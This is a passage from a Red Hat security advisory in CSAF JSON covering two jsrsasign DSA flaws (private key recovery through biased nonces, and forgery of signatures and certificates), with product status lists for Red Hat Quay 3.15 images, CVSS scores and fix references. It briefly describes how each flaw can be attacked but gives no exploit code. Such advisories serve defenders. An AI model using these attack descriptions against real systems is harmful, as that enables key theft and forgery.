"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsrsasign. An attacker can exploit an incomplete comparison vulnerability in the getRandomBigIntegerZeroToMax and getRandomBigIntegerMinToMax functions. By manipulating incorrect comparison checks, an attacker can bias the Digital Signature Algorithm (DSA) nonces during signature generation. This allows the attacker to recover the private key, leading to a critical security compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsrsasign: jsrsasign: Private key recovery via incomplete comparison checks biasing DSA nonces",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4599"
},
{
"category": "external",
"summary": "RHBZ#2450207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4599",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4599"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4599",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4599"
},
{
"category": "external",
"summary": "https://gist.github.com/Kr0emer/081681818b51605c91945126d74b4f20",
"url": "https://gist.github.com/Kr0emer/081681818b51605c91945126d74b4f20"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/commit/ee4b013478366cb16cea9a4bdfb218b6077f83b1",
"url": "https://github.com/kjur/jsrsasign/commit/ee4b013478366cb16cea9a4bdfb218b6077f83b1"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/pull/647",
"url": "https://github.com/kjur/jsrsasign/pull/647"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370939",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370939"
}
],
"release_date": "2026-03-23T05:00:12.522000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsrsasign: jsrsasign: Private key recovery via incomplete comparison checks biasing DSA nonces"
},
{
"cve": "CVE-2026-4600",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-23T06:01:39.334925+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450208"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in jsrsasign. An attacker can exploit improper verification of cryptographic signatures by supplying malicious domain parameters during the Digital Signature Algorithm (DSA) validation process. This allows the attacker to forge DSA signatures or X.509 certificates, which would then be accepted as legitimate, potentially leading to unauthorized access or data manipulation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsrsasign: jsrsasign: Cryptographic signature forgery via malicious DSA domain parameters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT. The flaw in jsrsasign allows an attacker to forge Digital Signature Algorithm (DSA) signatures or X.509 certificates by providing malicious domain parameters during validation. This could lead to unauthorized access or data manipulation in affected Red Hat products such as Migration Toolkit for Virtualization and Red Hat Quay, where jsrsasign is utilized for cryptographic signature verification.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4600"
},
{
"category": "external",
"summary": "RHBZ#2450208",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450208"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4600",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4600"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4600",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4600"
},
{
"category": "external",
"summary": "https://gist.github.com/Kr0emer/bf15ddc097176e951659a24a8e9002a7",
"url": "https://gist.github.com/Kr0emer/bf15ddc097176e951659a24a8e9002a7"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/commit/37b4c06b145c7bfd6bc2a6df5d0a12c56b15ef60",
"url": "https://github.com/kjur/jsrsasign/commit/37b4c06b145c7bfd6bc2a6df5d0a12c56b15ef60"
},
{
"category": "external",
"summary": "https://github.com/kjur/jsrsasign/pull/646",
"url": "https://github.com/kjur/jsrsasign/pull/646"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370940",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370940"
}
],
"release_date": "2026-03-23T05:00:08.475000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
